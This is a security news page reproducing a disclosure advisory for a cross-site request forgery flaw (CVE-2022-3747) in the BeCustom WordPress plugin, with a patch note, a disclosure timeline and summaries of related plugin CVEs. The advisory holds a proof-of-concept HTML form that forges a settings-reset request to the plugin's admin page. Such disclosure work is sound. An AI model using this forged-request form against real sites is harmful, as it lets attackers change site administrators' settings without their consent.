Security
Headlines
HeadlinesLatestCVEs

Headline

WordPress BeTheme BeCustom 1.0.5.2 Cross Site Request Forgery

WordPress BeTheme BeCustom plugin versions 1.0.5.2 and below suffer from a cross site request forgery vulnerability.

Packet Storm
#csrf#vulnerability#web#git#wordpress#php#acer#auth

RCE Security Advisory
https://www.rcesecurity.com

  1. ADVISORY INFORMATION
    =======================
    Product: BeCustom Wordpress Plugin
    Vendor URL: https://muffingroup.com/betheme/features/be-custom/
    Type: Cross-Site Request Forgery [CWE-253]
    Date found: 2021-10-28
    Date published: 2022-11-10
    CVSSv3 Score: 5.7 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N)
    CVE: CVE-2022-3747

  2. CREDITS
    ==========
    This vulnerability was discovered and researched by Julien Ahrens from
    RCE Security.

  3. VERSIONS AFFECTED
    ====================
    BeTheme BeCustom 1.0.5.2 and below

  4. INTRODUCTION
    ===============
    Built in-house add-on, perfect for agencies and web developers will let you rebrand
    Be & WordPresss Admin to your own product by replacing all the Be & Muffin logos with
    own.

This tool is supplied exclusively to the customers of Betheme and allows for changes
like: complete dashboard customization, replacement of logos, colors managment and much
more. With just a few clicks, you will turn the Be & Muffin brand into yours, thanks to
which you will increase the trust of your customers.

Moreover, from now on you can also customize the WPLogin page.

(from the vendor’s homepage)

  1. VULNERABILITY DETAILS
    ========================
    The WordPress plugin lacks an anti-CSRF protection on all of its functionalities, which
    ultimately allows an attacker to (amongst others):
  • Set custom brandings
  • Enable/Disable BeCustom features
  • Modify the WP Login view
  • Modify the BeDashboard texts

Since there is no anti-CSRF token protecting these functionalities, they are
vulnerable to Cross-Site Request Forgery attacks allowing an attacker to perform
a variety of attacks as mentioned above.

To successfully exploit this vulnerability, a user with the right to access the
plugin must be tricked into visiting an arbitrary website while having an authenticated
session in the application.

  1. PROOF OF CONCEPT
    ===================
    An exemplary exploit to reset the plugin’s configuration:

<html>
<body>
<form action="http://localhost/wp-admin/admin.php?page=be_custom_branding" method="POST">
<input type="hidden" name="betheme_label" value="" />
<input type="hidden" name="betheme_url_slug" value="" />
<input type="hidden" name="replaced_logo_url" value="" />
<input type="hidden" name="replaced_theme_image" value="" />
<input type="hidden" name="replaced_theme_desc" value="" />
<input type="hidden" name="replaced_theme_author" value="Muffin Group 1337" />
<input type="hidden" name="submit" value="Save changes" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

  1. SOLUTION
    ===========
    Update to BeCustom 1.0.5.3

  2. REPORT TIMELINE
    ==================
    2022-10-28: Discovery of the vulnerability
    2022-10-28: CVE requested from Wordfence (CNA)
    2022-10-28: Wordfence assigns CVE-2022-3747
    2022-11-01: Vendor notification
    2022-11-07: No response. Sent another notification.
    2022-11-08: Opened up a security support case on envato.com
    2022-11-xx: Vendor publishes version 1.0.5.3 without notification which fixes this issue
    2022-11-10: Public disclosure

  3. REFERENCES
    =============
    https://github.com/MrTuxracer/advisories

Related news

CVE-2022-4213: Vulnerability Advisories Continued - Wordfence

The Chained Quiz plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'dn' parameter on the 'chainedquiz_list' page in versions up to, and including, 1.3.2.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.

CVE-2022-4029: Vulnerability Advisories Continued - Wordfence

The Simple:Press plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'sforum_[md5 hash of the WordPress URL]' cookie value in versions up to, and including, 6.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. This would be highly complex to exploit as it would require the attacker to set the cookie a cookie for the targeted user.

CVE-2022-3747: Be Custom Branding - Betheme WordPress Theme

The Becustom plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.5.2. This is due to missing nonce validation when saving the plugin's settings. This makes it possible for unauthenticated attackers to update the plugin's settings like betheme_url_slug, replaced_theme_author, and betheme_label to name a few, via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVE-2022-3896: Vulnerability Advisories Continued - Wordfence

The WP Affiliate Platform plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via $_SERVER["REQUEST_URI"] in versions up to, and including, 6.3.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. This is unlikely to work in modern browsers.

CVE-2022-3897: Vulnerability Advisories Continued - Wordfence

The WP Affiliate Platform plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several parameters in versions up to, and including, 6.3.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVE-2022-4027: Vulnerability Advisories Continued - Wordfence

The Simple:Press plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'postitem' parameter manipulated during a forum response in versions up to, and including, 6.8 due to insufficient input sanitization and output escaping that makes injecting object and embed tags possible. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages when responding to forum threads that will execute whenever a user accesses an injected page.

CVE-2022-4028: Vulnerability Advisories Continued - Wordfence

The Simple:Press plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'postitem' parameter manipulated during the profile-save action when modifying a profile signature in versions up to, and including, 6.8 due to insufficient input sanitization and output escaping that makes injecting object and embed tags possible. This makes it possible for authenticated attackers, with minimal permissions, such as a subscriber to inject arbitrary web scripts in pages when modifying a profile signature that will execute whenever a user accesses an injected page.

CVE-2022-4034: Vulnerability Advisories Continued - Wordfence

The Appointment Hour Booking Plugin for WordPress is vulnerable to CSV Injection in versions up to, and including, 1.3.72. This makes it possible for unauthenticated attackers to embed untrusted input into content during booking creation that may be exported as a CSV file when a site's administrator exports booking details. This can result in code execution when these files are downloaded and opened on a local system with a vulnerable configuration.

CVE-2022-4036: Vulnerability Advisories Continued - Wordfence

The Appointment Hour Booking plugin for WordPress is vulnerable to CAPTCHA bypass in versions up to, and including, 1.3.72. This is due to the use of insufficiently strong hashing algorithm on the CAPTCHA secret that is also displayed to the user via a cookie.

CVE-2022-4032: Vulnerability Advisories Continued - Wordfence

The Quiz and Survey Master plugin for WordPress is vulnerable to iFrame Injection via the 'question[id]' parameter in versions up to, and including, 8.0.4 due to insufficient input sanitization and output escaping that allowed iframe tags to be injected. This makes it possible for unauthenticated attackers to inject iFrames in pages that will execute whenever a user accesses an injected page.

CVE-2022-4033: Vulnerability Advisories Continued - Wordfence

The Quiz and Survey Master plugin for WordPress is vulnerable to input validation bypass via the 'question[id]' parameter in versions up to, and including, 8.0.4 due to insufficient input validation that allows attackers to inject content other than the specified value (i.e. a number, file path, etc..). This makes it possible attackers to submit values other than the intended input type.

CVE-2022-4035: Vulnerability Advisories Continued - Wordfence

The Appointment Hour Booking plugin for WordPress is vulnerable to iFrame Injection via the ‘email’ or general field parameters in versions up to, and including, 1.3.72 due to insufficient input sanitization and output escaping that makes injecting iFrame tags possible. This makes it possible for unauthenticated attackers to inject iFrames when submitting a booking that will execute whenever a user accesses the injected booking details page.

CVE-2022-4169: Vulnerability Advisories Continued - Wordfence

The Theme and plugin translation for Polylang is vulnerable to authorization bypass in versions up to, and including, 3.2.16 due to missing capability checks in the process_polylang_theme_translation_wp_loaded() function. This makes it possible for unauthenticated attackers to update plugin and theme translation settings and to import translation strings.

CVE-2022-3861: Vulnerability Advisories Continued - Wordfence

The Betheme theme for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 26.5.1.4 via deserialization of untrusted input supplied via the import, mfn-items-import-page, and mfn-items-import parameters passed through the mfn_builder_import, mfn_builder_import_page, importdata, importsinglepage, and importfromclipboard functions. This makes it possible for authenticated attackers, with contributor level permissions and above to inject a PHP Object. The additional presence of a POP chain would make it possible for attackers to execute code, retrieve sensitive data, delete files, etc..

Packet Storm: Latest News

Ubuntu Security Notice USN-7027-1